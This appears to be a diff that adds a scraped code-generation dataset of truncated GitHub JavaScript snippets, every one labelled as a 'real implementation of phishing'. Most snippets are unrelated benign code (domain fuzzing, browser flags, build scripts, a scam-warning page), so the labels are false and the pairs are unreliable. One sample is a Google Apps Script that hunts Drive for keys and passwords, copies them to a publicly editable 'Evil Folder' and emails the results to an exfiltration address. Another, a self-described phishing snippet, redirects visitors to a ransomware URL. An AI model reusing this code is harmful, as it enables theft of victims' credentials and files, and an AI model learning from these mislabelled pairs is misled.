confirmCheck(word);\n });\n return { grtScale, urgScale, cfmScale };\n}\n\nfunction phishCheck(email, body) {\n let eScale = emailCheck(email);\n let urlScale = URLcheck(body);\n let dictScale = dic",
177
+ "language":"Javascript",
178
+ "repo_name":"PhishersOfMen\/Assn5-Phishing-SQLI",
179
+ "timestamp":"2025-05-22T22:01:02.523095",
180
+ "split":"training"
181
+ },
182
+ {
183
+ "task":"code_generation",
184
+ "problem_title":"phishing in Javascript",
185
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
186
+ "sample_solution":"#!\/usr\/bin\/env node\nconst fs = require('fs');\nconst debug = require('debug')('fuzz:main');\nconst Promise = require('bluebird');\nconst program = require('commander');\nconst request = require('request');\nconst libssdeep = require('ssdeep');\nconst csv = require('csv');\nconst ProgressBar = require('progress');\nconst CONF = require('.\/config');\nconst { printError, printInfo, printResult, printBanner, parseTarget, bye } = require('.\/lib\/utils');\nconst { DomainFuzz, DomainDict, DomainThread } = require('.\/lib');\n\nconst fuzz = (opts, domains, worker) => {\n const total = domains.length;\n const bar = new ProgressBar('Running [:bar] :percent :etas', {\n complete: '=',\n incomplete: ' ',\n width: 50,\n total,\n });\n Promise\n .map(domains, (domain) => {\n bar.tick(1);\n return worker.run(domain);\n }, { concurrency: opts.concurrency })\n .then((result) => {\n if (opts.option_output) {\n let data;\n if (opts.option_format === 'JSON') {\n data = JSON.stringify(result, null, 4);\n fs.appendFile(opts.option_output, data, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n } else if (opts.option_format === 'CSV') {\n data = [];\n const columns = 'fuzzer,domain-name,dns-a,dns-aaaa,dns-mx,dns-ns,geoip-country,whois-created,whois-updated,ssdeep-score';\n data.push(columns.split(','));\n for (const domain of result) {\n data.push(columns.split(',').map(_ => domain[_]));\n }\n csv.stringify(data, (parseErr, res) => {\n fs.appendFile(this.option_output, res, 'utf8', (err) => {\n if (err) printError(err.message);\n });\n });\n }\n }\n for (const domain of result) {\n printResult(domain);\n }\n })\n .catch(err => printError(err.message));\n};\n\nconst main = () => {\n const opts = program\n .version(CONF.version)\n .usage('[options] DOMAIN')\n .description(`Find similar-loo",
187
+ "language":"Javascript",
188
+ "repo_name":"monkeym4ster\/DomainFuzz",
189
+ "timestamp":"2025-05-22T22:01:02.651975",
190
+ "split":"training"
191
+ },
192
+ {
193
+ "task":"code_generation",
194
+ "problem_title":"phishing in Javascript",
195
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
196
+ "sample_solution":"const fs = require(\"fs\");\n\n\/\/ load puppeteer\nconst puppeteer = require('puppeteer');\n\nconst window_height = 768;\nconst window_width = 1366;\nconst studio_url = \"https:\/\/studio.youtube.com\/\";\n\n\/\/ directory contains the videos you want to upload\nconst upload_file_directory = \"your video directory\";\n\/\/ change user data directory to your directory\nconst chrome_user_data_directory = \"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Chromium\\\\User Data\";\n\nconst title_prefix = \"video title prefix \";\nconst video_description = \"\";\n\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--enable-features=NetworkService,NetworkServiceInProcess',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-extensions-with-background-pages',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n \/\/ BlinkGenPropertyTrees disabled due to crbug.com\/937609\n '--disable-features=TranslateUI,BlinkGenPropertyTrees',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--force-color-profile=srgb',\n '--metrics-recording-only',\n '--no-first-run',\n '--enable-automation',\n '--password-store=basic',\n '--use-mock-keychain',\n];\n\nlet files = [];\nfs.readdir(upload_file_directory, function (err, temp_files) {\n if (err) {\n console.log('Something went wrong...');\n return console.error(err);\n }\n for (let i = 0; i < temp_files.length; i++) {\n files.push(temp_files[i]);\n }\n});\n\ntry {\n (async () => {\n const browser = await puppeteer.launch(\n {\n 'headless': false, \/\/ have window\n executablePath: null,\n userDataDir: chrome_user_data_directory,\n ignoreDefaultArgs: ",
197
+ "language":"Javascript",
198
+ "repo_name":"last2win\/youtube-upload-multi-videos",
199
+ "timestamp":"2025-05-22T22:01:02.782934",
200
+ "split":"training"
201
+ },
202
+ {
203
+ "task":"code_generation",
204
+ "problem_title":"phishing in Javascript",
205
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
206
+ "sample_solution":"import warning from '.\/station.svg'\nimport terra from '.\/terra.svg'\nimport '.\/fonts.css'\nimport '.\/App.css'\n\nconst SAFE_PAGE = 'https:\/\/station.money'\n\nfunction App() {\n if (!document.referrer || document.referrer === window.location.href) {\n \/\/window.location.href = SAFE_PAGE\n }\n\n if (document.referrer) {\n const { hostname } = new URL(document.referrer)\n if (hostname === 'terra.money' || hostname.endsWith('.terra.money')) {\n return (\n <div className='app__terra'>\n <img src={terra} alt='Terra logo' \/>\n <h2>WARNING<\/h2>\n <p>\n <span className='url'>{hostname}<\/span> is currently\n unavailable. <br \/> Please visit{' '}\n <span className='url'>\n <a href='https:\/\/twitter.com\/terra_money'>\n twitter.com\/terra_money\n <\/a>\n <\/span>{' '}\n for updates.\n <\/p>\n <\/div>\n )\n }\n }\n\n return (\n <div className='App'>\n <img src={warning} alt='warning' \/>\n <h2>PHISHING ALERT<\/h2>\n <p>\n You are trying to visit <span className='url'>{document.referrer}<\/span>\n <br \/>\n which is a known scam website.\n <\/p>\n <span\n onClick={() => {\n window.location.href = SAFE_PAGE\n }}\n className='button__main'\n >\n Go back to safety\n <\/span>\n {\/*\n <a\n href={document.referrer}\n >\n Visit anyway\n <\/a>\n *\/}\n <\/div>\n )\n}\n\nexport default App\n",
207
+ "language":"Javascript",
208
+ "repo_name":"terra-money\/scam-alert-web",
209
+ "timestamp":"2025-05-22T22:01:02.912967",
210
+ "split":"training"
211
+ },
212
+ {
213
+ "task":"code_generation",
214
+ "problem_title":"phishing in Javascript",
215
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
216
+ "sample_solution":"const fs = require('fs')\nconst fsExtra = require('fs-extra')\nconst rmRf = require('rimraf')\n\nconst Streams = require('mississippi')\nconst bind = require('ap').partial\nconst async = require('.\/async')\n\nconst Browserify = require('browserify')\nconst watchify = require('watchify')\nconst sassStream = require('sass-css-stream')\n\n\n\n\nstart(function(err){\n if (err) throw err\n console.log('end')\n})\n\n\nfunction start(cb){\n async.series({\n clean,\n build,\n }, cb)\n}\n\nfunction clean(cb){\n fsExtra.remove('.\/dist\/', cb)\n}\n\nfunction build(cb){\n async.parallel({\n buildJs,\n buildCss,\n buildStatic,\n }, cb)\n}\n\nfunction buildJs(cb) {\n var browserify = Browserify({\n entries: ['.\/src\/js\/index.js'],\n cache: {},\n packageCache: {},\n \/\/ plugin: [watchify],\n })\n\n browserify.on('update', bundle)\n\n async.series({\n buildJsPrep: bind(fsExtra.mkdirs, '.\/dist\/js'),\n buildJsStart: start,\n }, cb)\n\n function start(cb){\n var firstBundle = bundle()\n Streams.finished(firstBundle, cb)\n }\n\n function bundle() {\n console.log('bundle')\n return Streams.pipeline(\n browserify.bundle(),\n fs.createWriteStream('.\/dist\/js\/bundle.js')\n )\n }\n}\n\nfunction buildCss(cb) {\n\n async.series({\n buildCssPrep: bind(fsExtra.mkdirs, '.\/dist\/css'),\n buildCssStart: start,\n }, cb)\n\n function start(cb) {\n var pipeline = Streams.pipeline(\n fs.createReadStream( '.\/src\/css\/index.scss' ),\n sassStream( '.\/src\/css\/index.scss' ),\n fs.createWriteStream( '.\/dist\/css\/bundle.css' )\n )\n Streams.finished(pipeline, cb)\n }\n}\n\nfunction buildStatic(cb) {\n\n async.parallel({\n imgs: bind(fsExtra.copy, '.\/src\/img\/', '.\/dist\/img\/'),\n faviconAndroid: bind(fsExtra.copy, '.\/src\/manifest.json', '.\/dist\/manifest.json'),\n faviconIE: bind(fsExtra.copy, '.\/src\/browserconfig.xml', '.\/dist\/browserconfig.xml'),\n fonts: bind(fsExtra.copy, '.\/src\/fonts\/', '.\/dist\/fonts\/'),\n index: bind(fsExtra.copy, '.\/src\/index.html'",
217
+ "language":"Javascript",
218
+ "repo_name":"409H\/landing",
219
+ "timestamp":"2025-05-22T22:01:03.059650",
220
+ "split":"training"
221
+ },
222
+ {
223
+ "task":"code_generation",
224
+ "problem_title":"phishing in Javascript",
225
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
226
+ "sample_solution":"\/\/ Created by Greg Carson @ Feb 2017\n\/\/ ---------------------------------------\n\/\/ Play nice and use for security training\n\/\/ and testing.\n\nfunction drivePassSearch() {\n \n \/\/ This creates a PUBLICALLY AVAILABLE RWX FOLDER in Drive under the executing users context.\n \/\/ This can be disabled for Google Apps for Business users:\n \/\/ https:\/\/support.google.com\/a\/answer\/60781?hl=en\n \/\/ Personal users shit out of luck? Not sure haven't looked into it.\n \n var folder = DriveApp.createFolder('Evil Folder');\n folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);\n \n \/\/ Construct malicious search query on drive. Look for PDFs? DOC\/XLS files? If you are looking for an extension use 'title contains'\n \/\/ If you want to search through content for a keyword use 'fullText contains' instead\n \/\/ You can construct more complex queries using logical operators, for example: 'and (mimeType contains 'image\/' or mimeType contains 'video\/')'\n \/\/ Not aware of case sensitivity or ability to perform regular expressions\n \/\/ Search Ideas? title contains .cer .pem .der .crt .pub id_rsa .docx .xlsx .vsd password .nessus ntds.dit \n \/\/ or fullText contains password or any other combination of keywords of interest such as target individuals, target servers, etcetera\n \n var files = DriveApp.searchFiles(\n 'modifiedDate > \"2013-02-28\" and title contains \"SEARCHTERMHERE\"');\n while (files.hasNext()) {\n var file = files.next();\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n Logger.log(file.getName());\n var name = file.getName();\n file.makeCopy(name,folder);\n Logger.log(file.getDownloadUrl());\n Logger.log(file.getUrl());\n \n }\n\n \/\/ Write Logger data to body of email and send to specified recipient\n \/\/ Sender address is the current active user\n \n Logger.log(folder.getUrl());\n var recipient = \"RECPIENT-EXFIL-EMAIL-ADDRESS-HERE\";\n var subject = 'Google Drive Query - KDBX';\n var body = Logger.getLog();\n MailApp.sendEmail(recipient, subj",
227
+ "language":"Javascript",
228
+ "repo_name":"gregkcarson\/GoogleAppScriptSE",
229
+ "timestamp":"2025-05-22T22:01:03.220189",
230
+ "split":"training"
231
+ },
232
+ {
233
+ "task":"code_generation",
234
+ "problem_title":"phishing in Javascript",
235
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
236
+ "sample_solution":"const express = require(\"express\");\nconst app = express();\nconst http = require(\"http\");\nconst server = http.createServer(app);\nconst puppeteer = require('puppeteer');\nconst port = 9001;\nvar browser;\napp.use(express.json())\napp.post('\/bot\/url', function(req, res) {\n res.setHeader('Content-Type', 'application\/json');\n console.log(req.body);\n let url = req.body.url\n console.log(url);\n startBot(url)\n .then(() => {\n res.send({\n message: 'success',\n data: req.body\n })\n })\n .catch((err) => {\n res.send({\n message: 'failed',\n error: err\n })\n })\n})\nasync function startBot(url) {\n console.log(browser);\n if(typeof browser !== 'undefined'){\n await browser.close()\n }\n const minimal_args = [\n '--autoplay-policy=user-gesture-required',\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-component-update',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-domain-reliability',\n '--disable-extensions',\n '--disable-features=AudioServiceOutOfProcess',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-notifications',\n '--disable-offer-store-unmasked-wallet-cards',\n '--disable-popup-blocking',\n '--disable-print-preview',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-setuid-sandbox',\n '--disable-speech-api',\n '--disable-sync',\n '--hide-scrollbars',\n '--ignore-gpu-blacklist',\n '--metrics-recording-only',\n '--mute-audio',\n '--no-default-browser-check',\n '--no-first-run',\n '--no-pings',\n '--no-sandbox',\n '--no-zygote',\n '--password-store=basic',\n '--use-gl=swiftshader',\n '--use-mock-keychain',\n ];\n console.log(\"Launching Headless Browser::::::::::::\");\n browser = await puppeteer.launch({\n ",
237
+ "language":"Javascript",
238
+ "repo_name":"arunjohn96\/webndi",
239
+ "timestamp":"2025-05-22T22:01:03.383520",
240
+ "split":"training"
241
+ },
242
+ {
243
+ "task":"code_generation",
244
+ "problem_title":"phishing in Javascript",
245
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
246
+ "sample_solution":"import React from 'react';\nimport {\n Route,\n Switch\n} from 'react-router-dom';\n\n\nconst isBrowser = typeof window !== \"undefined\" && typeof window.document !== \"undefined\";\nconst dummy = () => {};\n\n\nconst HelpTextPage = isBrowser? React.lazy(() => import(\".\/components\/helpText\")): dummy;\nconst WebhookPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_dashboard\/server_view\")): dummy;\nconst ManagerRootPage = isBrowser? React.lazy(() => import(\".\/pages\/emote_manager\/manager_root\")): dummy;\nconst LoginPage = isBrowser? React.lazy(() => import(\".\/pages\/login\")): dummy;\nconst InvitePage = isBrowser? React.lazy(() => import(\".\/pages\/invite\")): dummy;\nconst PrivacyPolicy = isBrowser? React.lazy(() => import(\".\/pages\/policy\")): dummy;\nconst GuildCreatorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_builder\")): dummy;\nconst GuildSelectorPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_selector\")): dummy;\nconst GuildStatusPage = isBrowser? React.lazy(() => import(\".\/pages\/guild_builder\/guild_status\")): dummy;\nconst LicensePage = isBrowser? React.lazy(() => import(\".\/pages\/licenses\")): dummy;\nconst CommandPage = isBrowser? React.lazy(() => import(\".\/pages\/commands\")): dummy;\nconst BotAddedPage = isBrowser? React.lazy(() => import(\".\/pages\/bot_added\")): dummy;\nconst PremiumPage = isBrowser? React.lazy(() => import(\".\/pages\/premium\")): dummy;\nconst PublicPackSearchPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/search\")): dummy;\nconst PublicPackPage = isBrowser? React.lazy(() => import(\".\/pages\/public_packs\/view\")): dummy;\nconst PhishingPage = isBrowser? React.lazy(() => import(\".\/pages\/phishing\")): dummy;\nconst TermsPage = isBrowser? React.lazy(() => import(\".\/pages\/terms\")): dummy;\n\n\nexport const FullRouter = ({loggedIn, HomePage}) => {\n return (\n <React.Suspense fallback={<div>Loading Page...<\/div>}>\n {!loggedIn && <LoggedOutRouter HomePage={HomePage}\/>}\n {loggedIn && <LoggedInRouter HomePage={H",
247
+ "language":"Javascript",
248
+ "repo_name":"NQN-Discord\/NQNFrontend",
249
+ "timestamp":"2025-05-22T22:01:03.529662",
250
+ "split":"training"
251
+ },
252
+ {
253
+ "task":"code_generation",
254
+ "problem_title":"phishing in Javascript",
255
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
256
+ "sample_solution":"const maxConfigItems = 600\r\nconst maxPerType = 300\r\nconst includeOriginalConfigs = 0\r\n\r\nconst subLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/trojan.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/ss.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub\/main\/Split\/Base64\/shadowsocks\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2Hub2\/main\/Split\/Base64\/vmess\",\r\n \"https:\/\/raw.githubusercontent.com\/NiREvil\/vless\/main\/sub\/freedom\"\r\n]\r\nconst cnfLinks = [\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2ray-Configs\/main\/Splitted-By-Protocol\/vmess.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/vmess_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/trojan_iran.txt\",\r\n \"https:\/\/raw.githubusercontent.com\/coldwater-10\/V2rayCollector\/main\/ss_iran.txt\"\r\n]\r\nconst cleanIPLink = \"https:\/\/raw.githubusercontent.com\/coldwater-10\/clash_rules\/main\/List%20of%20clean%20IPs.txt\"\r\nconst operatorList = [\"AST\", \"HWB\", \"IRC\", \"MBT\", \"MCI\", \"MKB\", \"PRS\", \"RTL\", \"SHT\", \"ZTL\", \"PIS\", \"DAT\", \"SAB\", \"ASR\", \"FAN\", \"ZTL\", \"SFR\", \"DID\", \"LAY\", \"MAH\", \"TAK\", \"PET\", \"AND\", \"RES\", \"AFR\", \"ARA\", \"SAM\", \"APT\", \"ALL\", \"PLUS\", \"TEST\", \"ENG\", \"FA\", \"IPV6\", \"IRCF\", \"ANTY\"]\r\nconst addressList = [\"discord.com\", \"cloudflare.com\", \"nginx.com\", \"cdnjs.com\", \"vimeo.com\", \"networksolutions.com\"]\r\nconst fpList = [\"chrome\", \"chrome\", \"chrome\", \"firefox\", \"safari\", \"edge\", \"ios\", \"android\", \"360\", \"qq\", \"random\", \"random\"]\r\nconst alpnList = [\"http\/1.1\", \"h2,http\/1.1\", \"h2,http\/1.1\", \"h2,http\/1.1\"]\r\nvar cleanIPs = []\r\n\r\nexport default {\r\n async fetch(request) {\r\n var url = new URL(request.url)\r\n var pathParts = url.pathname.replace(\/^\\\/|\\\/$\/g, \"\").split(\"\/\")\r\n var type = pathParts[0].toLowerCase()\r\n if ([\"sub\", \"clash\"].includes(type)) {\r\n if (pathParts[1] !== undefined) {\r\n var operator = pathParts[1].toUppe",
257
+ "language":"Javascript",
258
+ "repo_name":"NiREvil\/workers-cloudflare",
259
+ "timestamp":"2025-05-22T22:01:03.663874",
260
+ "split":"training"
261
+ },
262
+ {
263
+ "task":"code_generation",
264
+ "problem_title":"phishing in Javascript",
265
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
266
+ "sample_solution":"\/* eslint-env node *\/\nmodule.exports = {\n test_page: 'tests\/index.html?hidepassed',\n disable_watching: true,\n launch_in_ci: [\n 'Chrome',\n ],\n launch_in_dev: [\n 'Chrome',\n ],\n browser_args: {\n Chrome: [\n '--headless',\n '--no-sandbox',\n '--disable-gpu',\n '--disable-software-rasterizer',\n '--mute-audio',\n '--remote-debugging-port=0',\n '--window-size=1440,900',\n\n \/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/v1.11.0\/lib\/Launcher.js#L36\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-backgrounding-occluded-windows',\n '--disable-breakpad',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-extensions',\n '--disable-features=site-per-process',\n '--disable-hang-monitor',\n '--disable-ipc-flooding-protection',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-renderer-backgrounding',\n '--disable-sync',\n '--disable-translate',\n '--enable-automation',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n ],\n },\n};\n",
267
+ "language":"Javascript",
268
+ "repo_name":"bitcoin-black-bcb\/bcb-wallet",
269
+ "timestamp":"2025-05-22T22:01:03.841591",
270
+ "split":"training"
271
+ },
272
+ {
273
+ "task":"code_generation",
274
+ "problem_title":"phishing in Javascript",
275
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
276
+ "sample_solution":"\/\/'use strict';\n\nfunction appendMirr(data) {\n\tmirr = JSON.parse(data)[0];\n\tif(mirr.url) {\n\t\tvar altelem = document.createElement(\"h1\");\n\t\taltelem = '<br\/><a style=\"background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;\" href=\"'+mirr.url+'\">Try this working mirror instead<\/a>';\n\t\tvar element = document.getElementById('mainwarn');\n\t\telement.innerHTML += altelem;\n\t}\n}\n\nfunction newMirr(site, success) {\n\tif(site) {\n\t\tgetAjax('https:\/\/onion.live\/api\/v2\/public\/mirrors?site='+site+'&max=1', '', success);\n\t}\n}\n\nfunction handleResponse(message) {\n\tconsole.log(`Message from the background script: ${message.response}`);\n}\n\nfunction handleError(error) {\n\tconsole.log(`Error: ${error}`);\n}\n\nfunction getAjax(url, data, success) {\n\tvar params = typeof data == 'string' ? data : Object.keys(data).map(\n\t\tfunction(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }\n\t).join('&');\n\tvar xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(\"Microsoft.XMLHTTP\");\n\txhr.open('GET', url);\n\txhr.onreadystatechange = function() {\n\t\tif (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }\n\t\tif (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }\n\t};\n\txhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');\n\txhr.setRequestHeader('Content-Type', 'application\/x-www-form-urlencoded');\n\txhr.send(params);\n\treturn xhr;\n}\n\nfunction checkWorking(url, site) {\n\tvar MrChecker = new XMLHttpRequest(),\n\tCheckThisUrl = \"http:\/\/\"+url+\"\/\";\n\tMrChecker.open('get', CheckThisUrl, true);\n\tMrChecker.onreadystatechange = checkReadyState;\n\tfunction checkReadyState() {\n\t\tif (MrChecker.readyState === 4) {\n\t\t\tif (MrChecker.status >= 200 || MrChecker.status < 304) {\n\t\t\t\tvar element = document.getElementById('mainwarn');\n\t\t\t\tif(element) {\n\t",
277
+ "language":"Javascript",
278
+ "repo_name":"OnionDotLive\/onionliveplugin",
279
+ "timestamp":"2025-05-22T22:01:04.017163",
280
+ "split":"training"
281
+ },
282
+ {
283
+ "task":"code_generation",
284
+ "problem_title":"phishing in Javascript",
285
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
286
+ "sample_solution":"\/* \r\n####################################################################\r\n# s'abonner sur ma chaine youtube pour avoir plus de code phishing #\r\n# et hacking,il me donne le courage de faire les codes phishing # \r\n# #\r\n# subscribe on my youtube channel to have more phishing code #\r\n# and hacking, it gives me the courage to do the phishing codes #\r\n# #\r\n# ||~~ BY ~~ hakanonymos ~~|| #\r\n# #\r\n# #\r\n# #\r\n# skype et email : hakanonymos@hotmail.com # \r\n#################################################################### \r\n*\/\r\n\r\n \r\nvar xScroll, yScroll, timerPoll, timerRedirect, timerClock;\r\n \r\nfunction initRedirect(){\r\n if (typeof document.body.scrollTop != \"undefined\"){ \/\/IE,NS7,Moz\r\n xScroll = document.body.scrollLeft;\r\n yScroll = document.body.scrollTop;\r\n \r\n clearInterval(timerPoll); \/\/stop polling scroll move\r\n clearInterval(timerRedirect); \/\/stop timed redirect\r\n \r\n timerPoll = setInterval(\"pollActivity()\",1); \/\/poll scrolling votre site de redrection 10000 = 10 seconde\r\n timerRedirect = setInterval(\"location.href='https:\/\/panafricaine.com\/ransomware\/'\",300 0000); \/\/temps de redirection\r\n \r\n \r\n }\r\n else if (typeof window.pageYOffset != \"undefined\"){ \/\/other browsers that support pageYOffset\/pageXOffset instead\r\n ",
287
+ "language":"Javascript",
288
+ "repo_name":"hakanonymos\/chromeKeylogger",
289
+ "timestamp":"2025-05-22T22:01:04.152105",
290
+ "split":"training"
291
+ },
292
+ {
293
+ "task":"code_generation",
294
+ "problem_title":"phishing in Javascript",
295
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
296
+ "sample_solution":"import { useEffect, useState } from \"react\";\n\nimport Navbar from \".\/components\/Navbar\/Navbar\";\nimport Breadcrumbs from \".\/components\/Breadcrumbs\/Breadcrumbs\";\nimport ProductDetails from \".\/components\/ProductDetails\/ProductDetails\";\nimport ProductCarousel from \".\/components\/ProductCarousel\/ProductCarousel\";\n\nimport Swal from \"sweetalert2\";\n\nimport \".\/App.css\";\n\nconst App = () => {\n\tconst [darkMode, setDarkMode] = useState(false);\n\n\tconst toggleDarkMode = () => setDarkMode(prevState => !prevState);\n\n\tuseEffect(() => {\n\t\tSwal.fire({\n\t\t\ttitle: \"\u00a1Atenci\u00f3n!\",\n\t\t\ttext: \"Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan.\",\n\t\t\ticon: \"warning\",\n\t\t\tconfirmButtonText: \"\u00a1Entendido!\",\n\t\t\tconfirmButtonColor: \"#3484fa\",\n\t\t\tbackdrop: \"rgba(0, 0, 0, 0.8)\",\n\t\t});\n\t}, []);\n\n\treturn (\n\t\t<>\n\t\t\t<header className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} \/>\n\t\t\t<\/header>\n\n\t\t\t<main className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\t<Breadcrumbs \/>\n\t\t\t\t<ProductDetails \/>\n\t\t\t\t<ProductCarousel \/>\n\t\t\t<\/main>\n\n\t\t\t<footer className={darkMode ? \"dark-mode\" : \"\"}>\n\t\t\t\tDesarrollado por&nbsp;\n\t\t\t\t<a\n\t\t\t\t\thref=\"https:\/\/gastonperez.ar\/\"\n\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t>\n\t\t\t\t\tGast&oacute;n P&eacute;rez\n\t\t\t\t<\/a>\n\t\t\t\t<p>\n\t\t\t\t\tATENCI\u00d3N: Esta web se trata de un&nbsp;\n\t\t\t\t\t<a\n\t\t\t\t\t\thref=\"https:\/\/github.com\/goncy\/mercadolibre-details-challenge\"\n\t\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\t\trel=\"noreferrer\"\n\t\t\t\t\t>\n\t\t\t\t\t\tchallenge\n\t\t\t\t\t<\/a>\n\t\t\t\t\t, no es un intento de phishing hacia los usuarios que la\n\t\t\t\t\tvisitan.\n\t\t\t\t<\/p>\n\t\t\t<\/footer>\n\t\t<\/>\n\t);\n};\n\nexport default App;\n",
297
+ "language":"Javascript",
298
+ "repo_name":"GastonPerez97\/mercadolibre-details-challenge",
299
+ "timestamp":"2025-05-22T22:01:04.271013",
300
+ "split":"training"
301
+ }
302
+ ]
code_dataset_20250522_220104.xlsx ADDED
Binary file (27.1 kB). View file
 
code_dataset_20250522_220104_report.json ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "total_samples": 30,
3
+ "columns": [
4
+ "task",
5
+ "problem_title",
6
+ "problem_description",
7
+ "sample_solution",
8
+ "language",
9
+ "repo_name",
10
+ "timestamp",
11
+ "split"
12
+ ],
13
+ "timestamp": "20250522_220104"
14
+ }